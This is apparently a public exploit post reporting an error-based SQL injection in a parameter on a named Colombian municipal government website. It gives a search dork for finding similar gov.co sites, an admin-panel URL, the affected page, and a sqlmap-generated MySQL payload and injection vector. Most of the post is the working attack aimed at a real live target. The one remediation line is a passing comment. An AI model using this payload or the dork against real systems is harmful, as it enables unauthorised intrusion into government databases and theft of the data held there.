# Title: Colombia Government Site - Error-Based SQL Injection in GET Parameter "x"
# Dork: inurl:apc-aa/admin/ site:gov.co
# Date: 14/12/2017
# Test: w10
# Credit: Informacion - Anonymous
## AdminPanel: http://www.viota-cundinamarca.gov.co/apc-aa/admin/index.php3
# PoC (sqlmap injection-point report for parameter x):
===
---
Parameter: x (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: apc=ccx-1-&x=2625328 AND (SELECT 4094 FROM(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(4094=4094,1))),0x7171716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
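# Demo (affected page; the numeric x value should be validated as an integer or bound as a query parameter server-side):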
# www.viota-cundinamarca.gov.co/noticias.shtml?apc=ccx-1-&x=2625328
=========================================================================